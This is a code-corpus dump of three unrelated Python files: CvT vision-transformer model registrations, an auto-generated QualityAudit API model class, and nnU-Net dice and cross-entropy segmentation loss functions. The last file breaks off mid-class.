'DROP_RATE': [0.0, 0.0, 0.0],
'DROP_PATH_RATE': [0.0, 0.0, 0.1],
'QKV_BIAS': [True, True, True],
'CLS_TOKEN': [False, False, True],
'POS_EMBED': [False, False, False],
'QKV_PROJ_METHOD': ['dw_bn', 'dw_bn', 'dw_bn'],
'KERNEL_QKV': [3, 3, 3],
'PADDING_KV': [1, 1, 1],
'STRIDE_KV': [2, 2, 2],
'PADDING_Q': [1, 1, 1],
'STRIDE_Q': [1, 1, 1],
}
msvit_spec.update(kwargs)
msvit = _create_cvt('cvt_13_384',
pretrained,
in_chans=3,
num_classes=num_classes,
act_layer=QuickGELU,
norm_layer=partial(LayerNorm, eps=1e-5),
init=getattr(msvit_spec, 'INIT', 'trunc_norm'),
spec=msvit_spec)
return msvit
@register_model
def cvt_13_384_22k(num_classes=1000, pretrained=False, **kwargs):
msvit_spec = {
'INIT': 'trunc_norm',
'NUM_STAGES': 3,
'PATCH_SIZE': [7, 3, 3],
'PATCH_STRIDE': [4, 2, 2],
'PATCH_PADDING': [2, 1, 1],
'DIM_EMBED': [64, 192, 384],
'NUM_HEADS': [1, 3, 6],
'DEPTH': [1, 2, 10],
'MLP_RATIO': [4.0, 4.0, 4.0],
'ATTN_DROP_RATE': [0.0, 0.0, 0.0],
'DROP_RATE': [0.0, 0.0, 0.0],
'DROP_PATH_RATE': [0.0, 0.0, 0.1],
'QKV_BIAS': [True, True, True],
'CLS_TOKEN': [False, False, True],
'POS_EMBED': [False, False, False],
'QKV_PROJ_METHOD': ['dw_bn', 'dw_bn', 'dw_bn'],
'KERNEL_QKV': [3, 3, 3],
'PADDING_KV': [1, 1, 1],
'STRIDE_KV': [2, 2, 2],
'PADDING_Q': [1, 1, 1],
'STRIDE_Q': [1, 1, 1],
}
msvit_spec.update(kwargs)
msvit = _create_cvt('cvt_13_384_22k',
pretrained,
in_chans=3,
num_classes=num_classes,
act_layer=QuickGELU,
norm_layer=partial(LayerNorm, eps=1e-5),
init=getattr(msvit_spec, 'INIT', 'trunc_norm'),
spec=msvit_spec)
return msvit
@register_model
def cvt_21_224(num_classes=1000, pretrained=False, **kwargs):
msvit_spec = {
'INIT': 'trunc_norm',
'NUM_STAGES': 3,
'PATCH_SIZE': [7, 3, 3],
'PATCH_STRIDE': [4, 2, 2],
'PATCH_PADDING': [2, 1, 1],
'DIM_EMBED': [64, 192, 384],
'NUM_HEADS': [1, 3, 6],
'DEPTH': [1, 4, 16],
'MLP_RATIO': [4.0, 4.0, 4.0],
'ATTN_DROP_RATE': [0.0, 0.0, 0.0],
'DROP_RATE': [0.0, 0.0, 0.0],
'DROP_PATH_RATE': [0.0, 0.0, 0.1],
'QKV_BIAS': [True, True, True],
'CLS_TOKEN': [False, False, True],
'POS_EMBED': [False, False, False],
'QKV_PROJ_METHOD': ['dw_bn', 'dw_bn', 'dw_bn'],
'KERNEL_QKV': [3, 3, 3],
'PADDING_KV': [1, 1, 1],
'STRIDE_KV': [2, 2, 2],
'PADDING_Q': [1, 1, 1],
'STRIDE_Q': [1, 1, 1],
}
msvit_spec.update(kwargs)
msvit = _create_cvt('cvt_21_224',
pretrained,
in_chans=3,
num_classes=num_classes,
act_layer=QuickGELU,
norm_layer=partial(LayerNorm, eps=1e-5),
init=getattr(msvit_spec, 'INIT', 'trunc_norm'),
spec=msvit_spec)
return msvit
@register_model
def cvt_21_384(num_classes=1000, pretrained=False, **kwargs):
msvit_spec = {
'INIT': 'trunc_norm',
'NUM_STAGES': 3,
'PATCH_SIZE': [7, 3, 3],
'PATCH_STRIDE': [4, 2, 2],
'PATCH_PADDING': [2, 1, 1],
'DIM_EMBED': [64, 192, 384],
'NUM_HEADS': [1, 3, 6],
'DEPTH': [1, 4, 16],
'MLP_RATIO': [4.0, 4.0, 4.0],
'ATTN_DROP_RATE': [0.0, 0.0, 0.0],
'DROP_RATE': [0.0, 0.0, 0.0],
'DROP_PATH_RATE': [0.0, 0.0, 0.1],
'QKV_BIAS': [True, True, True],
'CLS_TOKEN': [False, False, True],
'POS_EMBED': [False, False, False],
'QKV_PROJ_METHOD': ['dw_bn', 'dw_bn', 'dw_bn'],
'KERNEL_QKV': [3, 3, 3],
'PADDING_KV': [1, 1, 1],
'STRIDE_KV': [2, 2, 2],
'PADDING_Q': [1, 1, 1],
'STRIDE_Q': [1, 1, 1],
}
msvit_spec.update(kwargs)
msvit = _create_cvt('cvt_21_384',
pretrained,
in_chans=3,
num_classes=num_classes,
act_layer=QuickGELU,
norm_layer=partial(LayerNorm, eps=1e-5),
init=getattr(msvit_spec, 'INIT', 'trunc_norm'),
spec=msvit_spec)
return msvit
@register_model
def cvt_21_384_22k(num_classes=1000, pretrained=False, **kwargs):
msvit_spec = {
'INIT': 'trunc_norm',
'NUM_STAGES': 3,
'PATCH_SIZE': [7, 3, 3],
'PATCH_STRIDE': [4, 2, 2],
'PATCH_PADDING': [2, 1, 1],
'DIM_EMBED': [64, 192, 384],
'NUM_HEADS': [1, 3, 6],
'DEPTH': [1, 4, 16],
'MLP_RATIO': [4.0, 4.0, 4.0],
'ATTN_DROP_RATE': [0.0, 0.0, 0.0],
'DROP_RATE': [0.0, 0.0, 0.0],
'DROP_PATH_RATE': [0.0, 0.0, 0.1],
'QKV_BIAS': [True, True, True],
'CLS_TOKEN': [False, False, True],
'POS_EMBED': [False, False, False],
'QKV_PROJ_METHOD': ['dw_bn', 'dw_bn', 'dw_bn'],
'KERNEL_QKV': [3, 3, 3],
'PADDING_KV': [1, 1, 1],
'STRIDE_KV': [2, 2, 2],
'PADDING_Q': [1, 1, 1],
'STRIDE_Q': [1, 1, 1],
}
msvit_spec.update(kwargs)
msvit = _create_cvt('cvt_21_384_22k',
pretrained,
in_chans=3,
num_classes=num_classes,
act_layer=QuickGELU,
norm_layer=partial(LayerNorm, eps=1e-5),
init=getattr(msvit_spec, 'INIT', 'trunc_norm'),
spec=msvit_spec)
return msvit
@register_model
def cvt_w24(num_classes=1000, pretrained=False, **kwargs):
msvit_spec = {
'INIT': 'trunc_norm',
'NUM_STAGES': 3,
'PATCH_SIZE': [7, 3, 3],
'PATCH_STRIDE': [4, 2, 2],
'PATCH_PADDING': [2, 1, 1],
'DIM_EMBED': [192, 768, 1024],
'NUM_HEADS': [3, 12, 16],
'DEPTH': [2, 2, 20],
'MLP_RATIO': [4.0, 4.0, 4.0],
'ATTN_DROP_RATE': [0.0, 0.0, 0.0],
'DROP_RATE': [0.0, 0.0, 0.0],
'DROP_PATH_RATE': [0.0, 0.0, 0.3],
'QKV_BIAS': [True, True, True],
'CLS_TOKEN': [False, False, True],
'POS_EMBED': [False, False, False],
'QKV_PROJ_METHOD': ['dw_bn', 'dw_bn', 'dw_bn'],
'KERNEL_QKV': [3, 3, 3],
'PADDING_KV': [1, 1, 1],
'STRIDE_KV': [2, 2, 2],
'PADDING_Q': [1, 1, 1],
'STRIDE_Q': [1, 1, 1],
}
msvit_spec.update(kwargs)
msvit = _create_cvt('cvt_w24',
pretrained,
in_chans=3,
num_classes=num_classes,
act_layer=QuickGELU,
norm_layer=partial(LayerNorm, eps=1e-5),
init=getattr(msvit_spec, 'INIT', 'trunc_norm'),
spec=msvit_spec)
return msvit
| 34.167763 | 108 | 0.491769 |
ace94916533d70c920a9035b9b419e67d056630c | 9,575 | py | Python | build/PureCloudPlatformClientV2/models/quality_audit.py | cjohnson-ctl/platform-client-sdk-python | 38ce53bb8012b66e8a43cc8bd6ff00cf6cc99100 | [
"MIT"
] | null | null | null | build/PureCloudPlatformClientV2/models/quality_audit.py | cjohnson-ctl/platform-client-sdk-python | 38ce53bb8012b66e8a43cc8bd6ff00cf6cc99100 | [
"MIT"
] | null | null | null | build/PureCloudPlatformClientV2/models/quality_audit.py | cjohnson-ctl/platform-client-sdk-python | 38ce53bb8012b66e8a43cc8bd6ff00cf6cc99100 | [
"MIT"
] | null | null | null | # coding: utf-8
"""
Copyright 2016 SmartBear Software
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Ref: https://github.com/swagger-api/swagger-codegen
"""
from pprint import pformat
from six import iteritems
import re
import json
from ..utils import sanitize_for_serialization
class QualityAudit(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
def __init__(self):
"""
QualityAudit - a model defined in Swagger
:param dict swaggerTypes: The key is attribute name
and the value is attribute type.
:param dict attributeMap: The key is attribute name
and the value is json key in definition.
"""
self.swagger_types = {
'id': 'str',
'name': 'str',
'user': 'User',
'job_id': 'str',
'action': 'str',
'entity': 'AuditEntity',
'level': 'str',
'timestamp': 'str',
'status': 'str',
'changes': 'list[Change]',
'entity_type': 'str',
'self_uri': 'str'
}
self.attribute_map = {
'id': 'id',
'name': 'name',
'user': 'user',
'job_id': 'jobId',
'action': 'action',
'entity': 'entity',
'level': 'level',
'timestamp': 'timestamp',
'status': 'status',
'changes': 'changes',
'entity_type': 'entityType',
'self_uri': 'selfUri'
}
self._id = None
self._name = None
self._user = None
self._job_id = None
self._action = None
self._entity = None
self._level = None
self._timestamp = None
self._status = None
self._changes = None
self._entity_type = None
self._self_uri = None
@property
def id(self):
"""
Gets the id of this QualityAudit.
The globally unique identifier for the object.
:return: The id of this QualityAudit.
:rtype: str
"""
return self._id
@id.setter
def id(self, id):
"""
Sets the id of this QualityAudit.
The globally unique identifier for the object.
:param id: The id of this QualityAudit.
:type: str
"""
self._id = id
@property
def name(self):
"""
Gets the name of this QualityAudit.
:return: The name of this QualityAudit.
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""
Sets the name of this QualityAudit.
:param name: The name of this QualityAudit.
:type: str
"""
self._name = name
@property
def user(self):
"""
Gets the user of this QualityAudit.
:return: The user of this QualityAudit.
:rtype: User
"""
return self._user
@user.setter
def user(self, user):
"""
Sets the user of this QualityAudit.
:param user: The user of this QualityAudit.
:type: User
"""
self._user = user
@property
def job_id(self):
"""
Gets the job_id of this QualityAudit.
:return: The job_id of this QualityAudit.
:rtype: str
"""
return self._job_id
@job_id.setter
def job_id(self, job_id):
"""
Sets the job_id of this QualityAudit.
:param job_id: The job_id of this QualityAudit.
:type: str
"""
self._job_id = job_id
@property
def action(self):
"""
Gets the action of this QualityAudit.
:return: The action of this QualityAudit.
:rtype: str
"""
return self._action
@action.setter
def action(self, action):
"""
Sets the action of this QualityAudit.
:param action: The action of this QualityAudit.
:type: str
"""
self._action = action
@property
def entity(self):
"""
Gets the entity of this QualityAudit.
:return: The entity of this QualityAudit.
:rtype: AuditEntity
"""
return self._entity
@entity.setter
def entity(self, entity):
"""
Sets the entity of this QualityAudit.
:param entity: The entity of this QualityAudit.
:type: AuditEntity
"""
self._entity = entity
@property
def level(self):
"""
Gets the level of this QualityAudit.
:return: The level of this QualityAudit.
:rtype: str
"""
return self._level
@level.setter
def level(self, level):
"""
Sets the level of this QualityAudit.
:param level: The level of this QualityAudit.
:type: str
"""
self._level = level
@property
def timestamp(self):
"""
Gets the timestamp of this QualityAudit.
:return: The timestamp of this QualityAudit.
:rtype: str
"""
return self._timestamp
@timestamp.setter
def timestamp(self, timestamp):
"""
Sets the timestamp of this QualityAudit.
:param timestamp: The timestamp of this QualityAudit.
:type: str
"""
self._timestamp = timestamp
@property
def status(self):
"""
Gets the status of this QualityAudit.
:return: The status of this QualityAudit.
:rtype: str
"""
return self._status
@status.setter
def status(self, status):
"""
Sets the status of this QualityAudit.
:param status: The status of this QualityAudit.
:type: str
"""
self._status = status
@property
def changes(self):
"""
Gets the changes of this QualityAudit.
:return: The changes of this QualityAudit.
:rtype: list[Change]
"""
return self._changes
@changes.setter
def changes(self, changes):
"""
Sets the changes of this QualityAudit.
:param changes: The changes of this QualityAudit.
:type: list[Change]
"""
self._changes = changes
@property
def entity_type(self):
"""
Gets the entity_type of this QualityAudit.
:return: The entity_type of this QualityAudit.
:rtype: str
"""
return self._entity_type
@entity_type.setter
def entity_type(self, entity_type):
"""
Sets the entity_type of this QualityAudit.
:param entity_type: The entity_type of this QualityAudit.
:type: str
"""
self._entity_type = entity_type
@property
def self_uri(self):
"""
Gets the self_uri of this QualityAudit.
The URI for this object
:return: The self_uri of this QualityAudit.
:rtype: str
"""
return self._self_uri
@self_uri.setter
def self_uri(self, self_uri):
"""
Sets the self_uri of this QualityAudit.
The URI for this object
:param self_uri: The self_uri of this QualityAudit.
:type: str
"""
self._self_uri = self_uri
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_json(self):
"""
Returns the model as raw JSON
"""
return json.dumps(sanitize_for_serialization(self.to_dict()))
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
| 22.961631 | 77 | 0.533055 |
ace94a54535e41958b512831a63e148169c4d261 | 21,169 | py | Python | nnunet/training/loss_functions/dice_loss.py | SarielMa/nnUNet | f9975139c7d8010bdf0415f7fd32a53022d30a69 | [
"Apache-2.0"
] | null | null | null | nnunet/training/loss_functions/dice_loss.py | SarielMa/nnUNet | f9975139c7d8010bdf0415f7fd32a53022d30a69 | [
"Apache-2.0"
] | null | null | null | nnunet/training/loss_functions/dice_loss.py | SarielMa/nnUNet | f9975139c7d8010bdf0415f7fd32a53022d30a69 | [
"Apache-2.0"
] | null | null | null | # Copyright 2020 Division of Medical Image Computing, German Cancer Research Center (DKFZ), Heidelberg, Germany
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import torch
from nnunet.training.loss_functions.TopK_loss import TopKLoss
from nnunet.training.loss_functions.crossentropy import RobustCrossEntropyLoss, MyRobustCrossEntropyLoss
from nnunet.utilities.nd_softmax import softmax_helper
from nnunet.utilities.tensor_utilities import sum_tensor
from torch import nn
import numpy as np
class GDL(nn.Module):
def __init__(self, apply_nonlin=None, batch_dice=False, do_bg=True, smooth=1.,
square=False, square_volumes=False):
"""
square_volumes will square the weight term. The paper recommends square_volumes=True; I don't (just an intuition)
"""
super(GDL, self).__init__()
self.square_volumes = square_volumes
self.square = square
self.do_bg = do_bg
self.batch_dice = batch_dice
self.apply_nonlin = apply_nonlin
self.smooth = smooth
def forward(self, x, y, loss_mask=None):
shp_x = x.shape
shp_y = y.shape
if self.batch_dice:
axes = [0] + list(range(2, len(shp_x)))
else:
axes = list(range(2, len(shp_x)))
if len(shp_x) != len(shp_y):
y = y.view((shp_y[0], 1, *shp_y[1:]))
if all([i == j for i, j in zip(x.shape, y.shape)]):
# if this is the case then gt is probably already a one hot encoding
y_onehot = y
else:
gt = y.long()
y_onehot = torch.zeros(shp_x)
if x.device.type == "cuda":
y_onehot = y_onehot.cuda(x.device.index)
y_onehot.scatter_(1, gt, 1)
if self.apply_nonlin is not None:
x = self.apply_nonlin(x)
if not self.do_bg:
x = x[:, 1:]
y_onehot = y_onehot[:, 1:]
tp, fp, fn, _ = get_tp_fp_fn_tn(x, y_onehot, axes, loss_mask, self.square)
# GDL weight computation, we use 1/V
volumes = sum_tensor(y_onehot, axes) + 1e-6 # add some eps to prevent div by zero
if self.square_volumes:
volumes = volumes ** 2
# apply weights
tp = tp / volumes
fp = fp / volumes
fn = fn / volumes
# sum over classes
if self.batch_dice:
axis = 0
else:
axis = 1
tp = tp.sum(axis, keepdim=False)
fp = fp.sum(axis, keepdim=False)
fn = fn.sum(axis, keepdim=False)
# compute dice
dc = (2 * tp + self.smooth) / (2 * tp + fp + fn + self.smooth)
dc = dc.mean()
return -dc
def get_tp_fp_fn_tn(net_output, gt, axes=None, mask=None, square=False):
"""
net_output must be (b, c, x, y(, z)))
gt must be a label map (shape (b, 1, x, y(, z)) OR shape (b, x, y(, z))) or one hot encoding (b, c, x, y(, z))
if mask is provided it must have shape (b, 1, x, y(, z)))
:param net_output:
:param gt:
:param axes: can be (, ) = no summation
:param mask: mask must be 1 for valid pixels and 0 for invalid pixels
:param square: if True then fp, tp and fn will be squared before summation
:return:
"""
if axes is None:
axes = tuple(range(2, len(net_output.size())))
shp_x = net_output.shape
shp_y = gt.shape
with torch.no_grad():
if len(shp_x) != len(shp_y):
gt = gt.view((shp_y[0], 1, *shp_y[1:]))
if all([i == j for i, j in zip(net_output.shape, gt.shape)]):
# if this is the case then gt is probably already a one hot encoding
y_onehot = gt
else:
gt = gt.long()
y_onehot = torch.zeros(shp_x)
if net_output.device.type == "cuda":
y_onehot = y_onehot.cuda(net_output.device.index)
y_onehot.scatter_(1, gt, 1)#?????
tp = net_output * y_onehot
fp = net_output * (1 - y_onehot)
fn = (1 - net_output) * y_onehot
tn = (1 - net_output) * (1 - y_onehot)
if mask is not None:
tp = torch.stack(tuple(x_i * mask[:, 0] for x_i in torch.unbind(tp, dim=1)), dim=1)
fp = torch.stack(tuple(x_i * mask[:, 0] for x_i in torch.unbind(fp, dim=1)), dim=1)
fn = torch.stack(tuple(x_i * mask[:, 0] for x_i in torch.unbind(fn, dim=1)), dim=1)
tn = torch.stack(tuple(x_i * mask[:, 0] for x_i in torch.unbind(tn, dim=1)), dim=1)
if square:
tp = tp ** 2
fp = fp ** 2
fn = fn ** 2
tn = tn ** 2
if len(axes) > 0:
tp = sum_tensor(tp, axes, keepdim=False)
fp = sum_tensor(fp, axes, keepdim=False)
fn = sum_tensor(fn, axes, keepdim=False)
tn = sum_tensor(tn, axes, keepdim=False)
return tp, fp, fn, tn
class SoftDiceLoss(nn.Module):
def __init__(self, apply_nonlin=None, batch_dice=False, do_bg=True, smooth=1.):
"""
"""
super(SoftDiceLoss, self).__init__()
self.do_bg = do_bg
self.batch_dice = batch_dice
self.apply_nonlin = apply_nonlin
self.smooth = smooth
def forward(self, x, y, loss_mask=None):
shp_x = x.shape
if self.batch_dice:
axes = [0] + list(range(2, len(shp_x)))
else:
axes = list(range(2, len(shp_x)))
if self.apply_nonlin is not None:
x = self.apply_nonlin(x)
tp, fp, fn, _ = get_tp_fp_fn_tn(x, y, axes, loss_mask, False)
nominator = 2 * tp + self.smooth
denominator = 2 * tp + fp + fn + self.smooth
dc = nominator / (denominator + 1e-8)
if not self.do_bg:
if self.batch_dice:
dc = dc[1:]
else:
dc = dc[:, 1:]
dc = dc.mean()
return -dc
class MySoftDiceLoss(nn.Module):
def __init__(self, apply_nonlin=None, batch_dice=False, do_bg=True, smooth=1.):
"""
"""
super(MySoftDiceLoss, self).__init__()
self.do_bg = do_bg
self.batch_dice = batch_dice
self.apply_nonlin = apply_nonlin
self.smooth = smooth
def forward(self, x, y, loss_mask=None):
shp_x = x.shape
if self.batch_dice:
axes = [0] + list(range(2, len(shp_x)))
else:
axes = list(range(2, len(shp_x)))
if self.apply_nonlin is not None:
x = self.apply_nonlin(x)
tp, fp, fn, _ = get_tp_fp_fn_tn(x, y, axes, loss_mask, False)
nominator = 2 * tp + self.smooth
denominator = 2 * tp + fp + fn + self.smooth
dc = nominator / (denominator + 1e-8)
if not self.do_bg:
if self.batch_dice:
dc = dc[1:]
else:
dc = dc[:, 1:]
dc = dc.mean(axis = 1)
return -dc
class DiceIndex(nn.Module):
def __init__(self, apply_nonlin=softmax_helper, batch_dice=True, do_bg=False):
"""
"""
super(DiceIndex, self).__init__()
self.do_bg = do_bg
self.batch_dice = batch_dice
self.apply_nonlin = apply_nonlin
def forward(self, x, y, loss_mask=None):
shp_x = x.shape
if self.batch_dice:
axes = [0] + list(range(2, len(shp_x)))
else:
axes = list(range(2, len(shp_x)))
if self.apply_nonlin is not None:
x = self.apply_nonlin(x)
tp, fp, fn, _ = get_tp_fp_fn_tn(x, y, axes, loss_mask, False)
nominator = 2 * tp
denominator = 2 * tp + fp + fn
dc = nominator / (denominator + 1e-8)
if not self.do_bg:
if self.batch_dice:
dc = dc[1:]
else:
dc = dc[:, 1:]
dc = dc.mean()
return dc
class MyDiceIndex(nn.Module):
def __init__(self, apply_nonlin=softmax_helper, batch_dice=True, do_bg=False):
"""
"""
super(MyDiceIndex, self).__init__()
self.do_bg = do_bg
self.batch_dice = batch_dice
self.apply_nonlin = apply_nonlin
def forward(self, x, y, loss_mask=None):
shp_x = x.shape
if self.batch_dice:
axes = [0] + list(range(2, len(shp_x)))
else:
axes = list(range(2, len(shp_x)))
if self.apply_nonlin is not None:
x = self.apply_nonlin(x)
tp, fp, fn, _ = get_tp_fp_fn_tn(x, y, axes, loss_mask, False)
nominator = 2 * tp
denominator = 2 * tp + fp + fn
dc = nominator / (denominator + 1e-8)
if not self.do_bg:
if self.batch_dice:
dc = dc[1:]
else:
dc = dc[:, 1:]
dc = dc.mean(axis=1)
return dc
class MCCLoss(nn.Module):
def __init__(self, apply_nonlin=None, batch_mcc=False, do_bg=True, smooth=0.0):
"""
based on matthews correlation coefficient
https://en.wikipedia.org/wiki/Matthews_correlation_coefficient
Does not work. Really unstable. F this.
"""
super(MCCLoss, self).__init__()
self.smooth = smooth
self.do_bg = do_bg
self.batch_mcc = batch_mcc
self.apply_nonlin = apply_nonlin
def forward(self, x, y, loss_mask=None):
shp_x = x.shape
voxels = np.prod(shp_x[2:])
if self.batch_mcc:
axes = [0] + list(range(2, len(shp_x)))
else:
axes = list(range(2, len(shp_x)))
if self.apply_nonlin is not None:
x = self.apply_nonlin(x)
tp, fp, fn, tn = get_tp_fp_fn_tn(x, y, axes, loss_mask, False)
tp /= voxels
fp /= voxels
fn /= voxels
tn /= voxels
nominator = tp * tn - fp * fn + self.smooth
denominator = ((tp + fp) * (tp + fn) * (tn + fp) * (tn + fn)) ** 0.5 + self.smooth
mcc = nominator / denominator
if not self.do_bg:
if self.batch_mcc:
mcc = mcc[1:]
else:
mcc = mcc[:, 1:]
mcc = mcc.mean()
return -mcc
class SoftDiceLossSquared(nn.Module):
def __init__(self, apply_nonlin=None, batch_dice=False, do_bg=True, smooth=1.):
"""
squares the terms in the denominator as proposed by Milletari et al.
"""
super(SoftDiceLossSquared, self).__init__()
self.do_bg = do_bg
self.batch_dice = batch_dice
self.apply_nonlin = apply_nonlin
self.smooth = smooth
def forward(self, x, y, loss_mask=None):
shp_x = x.shape
shp_y = y.shape
if self.batch_dice:
axes = [0] + list(range(2, len(shp_x)))
else:
axes = list(range(2, len(shp_x)))
if self.apply_nonlin is not None:
x = self.apply_nonlin(x)
with torch.no_grad():
if len(shp_x) != len(shp_y):
y = y.view((shp_y[0], 1, *shp_y[1:]))
if all([i == j for i, j in zip(x.shape, y.shape)]):
# if this is the case then gt is probably already a one hot encoding
y_onehot = y
else:
y = y.long()
y_onehot = torch.zeros(shp_x)
if x.device.type == "cuda":
y_onehot = y_onehot.cuda(x.device.index)
y_onehot.scatter_(1, y, 1).float()
intersect = x * y_onehot
# values in the denominator get smoothed
denominator = x ** 2 + y_onehot ** 2
# aggregation was previously done in get_tp_fp_fn, but needs to be done here now (needs to be done after
# squaring)
intersect = sum_tensor(intersect, axes, False) + self.smooth
denominator = sum_tensor(denominator, axes, False) + self.smooth
dc = 2 * intersect / denominator
if not self.do_bg:
if self.batch_dice:
dc = dc[1:]
else:
dc = dc[:, 1:]
dc = dc.mean()
return -dc
class MySoftDiceLossSquared(nn.Module):
def __init__(self, apply_nonlin=None, batch_dice=False, do_bg=True, smooth=1.):
"""
squares the terms in the denominator as proposed by Milletari et al.
"""
super(SoftDiceLossSquared, self).__init__()
self.do_bg = do_bg
self.batch_dice = batch_dice
self.apply_nonlin = apply_nonlin
self.smooth = smooth
def forward(self, x, y, loss_mask=None):
shp_x = x.shape
shp_y = y.shape
if self.batch_dice:
axes = [0] + list(range(2, len(shp_x)))
else:
axes = list(range(2, len(shp_x)))
if self.apply_nonlin is not None:
x = self.apply_nonlin(x)
with torch.no_grad():
if len(shp_x) != len(shp_y):
y = y.view((shp_y[0], 1, *shp_y[1:]))
if all([i == j for i, j in zip(x.shape, y.shape)]):
# if this is the case then gt is probably already a one hot encoding
y_onehot = y
else:
y = y.long()
y_onehot = torch.zeros(shp_x)
if x.device.type == "cuda":
y_onehot = y_onehot.cuda(x.device.index)
y_onehot.scatter_(1, y, 1).float()
intersect = x * y_onehot
# values in the denominator get smoothed
denominator = x ** 2 + y_onehot ** 2
# aggregation was previously done in get_tp_fp_fn, but needs to be done here now (needs to be done after
# squaring)
intersect = sum_tensor(intersect, axes, False) + self.smooth
denominator = sum_tensor(denominator, axes, False) + self.smooth
dc = 2 * intersect / denominator
if not self.do_bg:
if self.batch_dice:
dc = dc[1:]
else:
dc = dc[:, 1:]
dc = dc.mean(axis = 1)
return -dc
class DC_and_CE_loss(nn.Module):
def __init__(self, soft_dice_kwargs, ce_kwargs, aggregate="sum", square_dice=False, weight_ce=1, weight_dice=1,
log_dice=False, ignore_label=None):
"""
CAREFUL. Weights for CE and Dice do not need to sum to one. You can set whatever you want.
:param soft_dice_kwargs:
:param ce_kwargs:
:param aggregate:
:param square_dice:
:param weight_ce:
:param weight_dice:
"""
super(DC_and_CE_loss, self).__init__()
if ignore_label is not None:
assert not square_dice, 'not implemented'
ce_kwargs['reduction'] = 'none'
self.log_dice = log_dice
self.weight_dice = weight_dice
self.weight_ce = weight_ce
self.aggregate = aggregate
self.ce = RobustCrossEntropyLoss(**ce_kwargs)
self.ignore_label = ignore_label
if not square_dice:
self.dc = SoftDiceLoss(apply_nonlin=softmax_helper, **soft_dice_kwargs)
else:
self.dc = SoftDiceLossSquared(apply_nonlin=softmax_helper, **soft_dice_kwargs)
def forward(self, net_output, target):
"""
target must be b, c, x, y(, z) with c=1
:param net_output:
:param target:
:return:
"""
if self.ignore_label is not None:
assert target.shape[1] == 1, 'not implemented for one hot encoding'
mask = target != self.ignore_label
target[~mask] = 0
mask = mask.float()
else:
mask = None
dc_loss = self.dc(net_output, target, loss_mask=mask) if self.weight_dice != 0 else 0
if self.log_dice:
dc_loss = -torch.log(-dc_loss)
ce_loss = self.ce(net_output, target[:, 0].long()) if self.weight_ce != 0 else 0
if self.ignore_label is not None:
ce_loss *= mask[:, 0]
ce_loss = ce_loss.sum() / mask.sum()
if self.aggregate == "sum":
result = self.weight_ce * ce_loss + self.weight_dice * dc_loss
else:
raise NotImplementedError("nah son") # reserved for other stuff (later)
return result
class My_DC_and_CE_loss(nn.Module):
def __init__(self, soft_dice_kwargs, ce_kwargs, aggregate="sum", square_dice=False, weight_ce=1, weight_dice=1,
log_dice=False, ignore_label=None):
"""
CAREFUL. Weights for CE and Dice do not need to sum to one. You can set whatever you want.
:param soft_dice_kwargs:
:param ce_kwargs:
:param aggregate:
:param square_dice:
:param weight_ce:
:param weight_dice:
"""
super(My_DC_and_CE_loss, self).__init__()
if ignore_label is not None:
assert not square_dice, 'not implemented'
ce_kwargs['reduction'] = 'none'
self.log_dice = log_dice
self.weight_dice = weight_dice
self.weight_ce = weight_ce
self.aggregate = aggregate
self.ce = MyRobustCrossEntropyLoss(**ce_kwargs)
self.ignore_label = ignore_label
if not square_dice:
self.dc = MySoftDiceLoss(apply_nonlin=softmax_helper, **soft_dice_kwargs)
else:
self.dc = MySoftDiceLossSquared(apply_nonlin=softmax_helper, **soft_dice_kwargs)
def forward(self, net_output, target):
"""
target must be b, c, x, y(, z) with c=1
:param net_output:
:param target:
:return:
"""
if self.ignore_label is not None:
assert target.shape[1] == 1, 'not implemented for one hot encoding'
mask = target != self.ignore_label
target[~mask] = 0
mask = mask.float()
else:
mask = None
dc_loss = self.dc(net_output, target, loss_mask=mask) if self.weight_dice != 0 else 0
if self.log_dice:
dc_loss = -torch.log(-dc_loss)
ce_loss = self.ce(net_output, target[:, 0].long()) if self.weight_ce != 0 else 0
ce_loss = torch.mean(ce_loss, [1,2])
if self.ignore_label is not None:
ce_loss *= mask[:, 0]
ce_loss = ce_loss.sum() / mask.sum()
if self.aggregate == "sum":
result = self.weight_ce * ce_loss + self.weight_dice * dc_loss
else:
raise NotImplementedError("nah son") # reserved for other stuff (later)
return result
class DC_and_BCE_loss(nn.Module):
def __init__(self, bce_kwargs, soft_dice_kwargs, aggregate="sum"):
"""
DO NOT APPLY NONLINEARITY IN YOUR NETWORK!
THIS LOSS IS INTENDED TO BE USED FOR BRATS REGIONS ONLY
:param soft_dice_kwargs:
:param bce_kwargs:
:param aggregate:
"""
super(DC_and_BCE_loss, self).__init__()
self.aggregate = aggregate
self.ce = nn.BCEWithLogitsLoss(**bce_kwargs)
self.dc = SoftDiceLoss(apply_nonlin=torch.sigmoid, **soft_dice_kwargs)
def forward(self, net_output, target):
ce_loss = self.ce(net_output, target)
dc_loss = self.dc(net_output, target)
if self.aggregate == "sum":
result = ce_loss + dc_loss
else:
raise NotImplementedError("nah son") # reserved for other stuff (later)
return result
class GDL_and_CE_loss(nn.Module):
def __init__(self, gdl_dice_kwargs, ce_kwargs, aggregate="sum"):
